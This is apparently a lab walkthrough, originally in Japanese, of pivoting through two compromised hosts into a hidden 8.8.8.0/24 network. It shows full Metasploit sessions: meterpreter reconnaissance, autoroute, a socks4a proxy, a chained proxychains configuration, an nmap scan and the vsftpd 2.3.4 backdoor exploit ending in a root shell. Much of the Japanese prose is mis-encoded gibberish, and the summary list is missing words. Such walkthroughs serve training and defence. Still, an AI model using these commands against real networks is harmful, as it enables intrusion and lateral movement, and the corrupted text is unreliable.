ãã·ã³7.7.7.20ã«ã¢ã¯ã»ã¹ã§ãããããåŒãç¶ãæ å ±ãåéã§ããŸãã çµå±ã®ãšãããJCãã·ã³ã«ã¯2ã€ã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ããããŸãã ããã¯ãçŽæ¥ã¢ã¯ã»ã¹ã§ããªã2çªç®ã®ãããã¯ãŒã¯ãèŠã€ããããšãæå³ããŸãïŒ8.8.8.0/24ïŒã
meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:29:cd:cb MTU : 1500 IPv4 Address : 8.8.8.3 IPv4 Netmask : 255.255.255.0 Interface 65540 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:e3:47:43 MTU : 1500 IPv4 Address : 7.7.7.20 IPv4 Netmask : 255.255.255.0 arp-. meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24 [*] Running module against SRV03 [*] ARP Scanning 8.8.8.0/24 [*] IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS) [*] IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN) [*] IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS) [*] IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) , 4 . . meterpreter > run autoroute -s 8.8.8.0/24 [*] Adding a route to 8.8.8.0/255.255.255.0... [+] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20 [*] Use the -p option to list all active routes msf > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 7.7.7.0 255.255.255.0 Session 1 8.8.8.0 255.255.255.0 Session 3
ããã«ããã¯ãããã
8.8.8.0/24ã®ãããã¯ãŒã¯ãèŠã€ãããŸããã 䟵害ãããRDãã·ã³ãä»ãã172.16.0.0/24ãš7.7.7.0/24ã®éã®ã«ãŒãã¯ãã§ã«ãããŸãã çŸåšã®æ§æã§ã¯ã172.16.0.20ãããã¯ãŒã¯ããJCãã¹ãïŒ2çªç®ã«äŸµå®³ããããã·ã³ïŒã«å°çãããã±ããã¯ãæåã«RDãã¹ãïŒæåã«äŸµå®³ããããã·ã³ïŒã«éä¿¡ãããRDã¯ãã§ã«JCãã·ã³ã«ãããŒããã£ã¹ãããŠããŸãã æ»æè ïŒ172.16.0.20ïŒãæ°ãã8.8.8.0/24ãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ãããå Žåãæ°ããã«ãŒãã£ã³ã°ã«ãŒã«ãå®çŸ©ããå¿ èŠããããŸãã Metasploit Framework以å€ã®ããŒã«ã䜿çšããã«ã¯ãæ°ããsocks4ãããã·ãµãŒããŒãèµ·åããŠ2ã€ã®ããããããŒããæ¥ç¶ããproxychainsèšå®ã§æ°ãããããã·ãµãŒããŒãèšå®ããå¿ èŠããããŸãã
æ»æè ã®ãã·ã³ïŒ172.16.0.20ïŒããéä¿¡ãããå®å ã¢ãã¬ã¹8.8.8.9ã®ãããã¯ãŒã¯ãã±ããã¯ã2ã€ã®äŸµå®³ããããã·ã³ãééããå¿ èŠããããŸãã
- RDïŒIP 8.8.8.9ã«ã¢ã¯ã»ã¹ããæ¹æ³ãããããŸããã ããããç§ã¯ãã®IPã«ã¢ã¯ã»ã¹ã§ããã«ãŒã¿ãŒãç¥ã£ãŠããŸãã ç§ã¯åœŒã«ãã±ããããªãã€ã¬ã¯ãã§ããŸãã
- JCïŒãããã¯ãŒã¯7.7.7.0/24ãããããã¯ãŒã¯8.8.8.0/24ã«ãã±ããããªãã€ã¬ã¯ãããæ¹æ³ãç¥ã£ãŠããŸãã
ãã®çµæã次ã®ã¹ããŒã ãåŸãããŸãã
å šèœã®ãããã·ãã§ãŒã³
ProxyChainsããŒã«ã¯ããããã·ã®ãã§ãŒã³ãä»ããŠãã³ãã«ãäœæãããã®ãã³ãã«ãä»ããŠå®å ã¢ãã¬ã¹ã«ãã±ãããéä¿¡ããŸãã æåŸã®æé ã¯ã8.8.8.0 / 24ãããã¯ãŒã¯ã®ããŒã1081ã§ãªãã¹ã³ããsocks4ãããã·ãµãŒããŒãäœæããããšã§ãã
msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.0.20 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy msf auxiliary(socks4a) > set SRVPORT 1081 SRVPORT => 1081 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > The information of the new proxy server will define in the /etc/proxychains.conf configuration file. By activating the Dynamic Chain setting, sequential switching between the defined proxy servers is ensured.
/etc/proxychains.confãã¡ã€ã«ã®proxychainsèšå®ã調æŽããããã«æ®ããŸãã ãã€ãããã¯ãã§ãŒã³ãªãã·ã§ã³ã䜿çšããŠãproxychainsæ§æãã¡ã€ã«ã§æå®ããããããã·ã®ãã§ãŒã³ã«æ²¿ã£ãŠãã±ãããå³å¯ã«äžããäžã«é çªã«ç§»åããããã«ããŸãã
root@kali:~# cat /etc/proxychains.conf | grep -v "#" dynamic_chain proxy_dns tcp_read_time_out 15000 tcp_connect_time_out 8000 socks4 172.16.0.20 1080 # First Pivot socks4 172.16.0.20 1081 # Second Pivot
ãããã·ãã§ãŒã³ã䜿çšããŠããã³ãã«ãéããŠãã¹ã8.8.8.9ãã¹ãã£ã³ã§ããŸãã
root@kali:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vv ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html). NSE: Loaded 36 scripts for scanning. Initiating Connect Scan Scanning 8.8.8.9 [4 ports] |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK Discovered open port 21/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK Discovered open port 23/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK Discovered open port 22/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Discovered open port 80/tcp on 8.8.8.9 Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports) Initiating Service scan at 05:54 Scanning 4 services on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host) NSE: Script scanning 8.8.8.9. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 05:54 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed NSE at 05:54, 1.71s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 05:54 Completed NSE at 05:54, 0.00s elapsed Nmap scan report for 8.8.8.9 Host is up, received user-set (0.41s latency). Scanned PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 2.3.4 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet syn-ack Linux telnetd 80/tcp open http syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds root@kali:~#
ã芧ã®ãšããããã±ããã¯2ã€ã®ãããã·ãééããæçµçã«ç®æšãéæããŸãã
ã¹ãã£ã³ã®çµæãvsftpdã®è匱ãªããŒãžã§ã³ããã¹ã8.8.8.9ã§æ€åºãããŸãã 次ã®æé ã«åŸã£ãŠãã¿ãŒã²ããã䟵害ããŸãã
msf > msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9 rhost => 8.8.8.9 msf exploit(vsftpd_234_backdoor) > run [*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4) [*] 8.8.8.9:21 - USER: 331 Please specify the password. [+] 8.8.8.9:21 - Backdoor service has been spawned, handling... [+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 4 opened (Local Pipe -> Remote Pipe) pwd / id uid=0(root) gid=0(root) ifconfig eth0 Link encap:Ethernet HWaddr 08:00:27:56:f1:7c inet addr:8.8.8.9 Bcast:8.8.8.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10843 errors:0 dropped:0 overruns:0 frame:0 TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1081842 (1.0 MB) TX bytes:661455 (645.9 KB) Base address:0xd010 Memory:f0000000-f0020000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:18161 errors:0 dropped:0 overruns:0 frame:0 TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:5307479 (5.0 MB) TX bytes:5307479 (5.0 MB)
察ç
2ã€ã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ãããããã®ãã¡ã®1ã€ãDMZããã¢ã¯ã»ã¹å¯èœãªå®å šã§ãªããã¹ãã¯ããããã¯ãŒã¯ã€ã³ãã©ã¹ãã©ã¯ãã£ããåé€ããå¿ èŠããããŸãã DMZã«ãããã¹ãã¯ãDMZããã®ã¿ã¢ã¯ã»ã¹ã§ããå¿ èŠããããŸãã
ãããã«
æ»æè ã¯ã次ã®æé ã®çµæãšããŠ2ã€ã®é ããããããã¯ãŒã¯ãçºèŠããŸããã
- æ»æè ã¯ãæ»æè ãšåããããã¯ãŒã¯äžã«ããRDãã·ã³ã«ã¢ã¯ã»ã¹ããŸããã
- RDãã¹ãã«ã¯2ã€ã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ããããé衚瀺ã®ãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ã§ããããšãçºèŠãããŸããã
- post- Metasploit autoroute.
- ARP NMAP 7.7.7.0/24 JC.
- JC : Easy File Share MS08-067.
- MS08-067 7.7.7.20
- , , JC .
- JC (7.7.7.20).
- ARP NMAP 8.8.8.0/24.
- vsftp 8.8.8.9 ( SK).
- SK .
ãããã£ãŠãæ»æè ã¯äžé£ã®æ»æãéããŠ1ã€ã®ãããã¯ãŒã¯ã«ããã¢ââã¯ã»ã¹ã§ãããå®å šãªãããã¯ãŒã¯å¢çã®èåŸã«ããäŒæ¥ãããã¯ãŒã¯ã®èåŸã«ãããã¹ãã䟵害ããããšãã§ããŸããã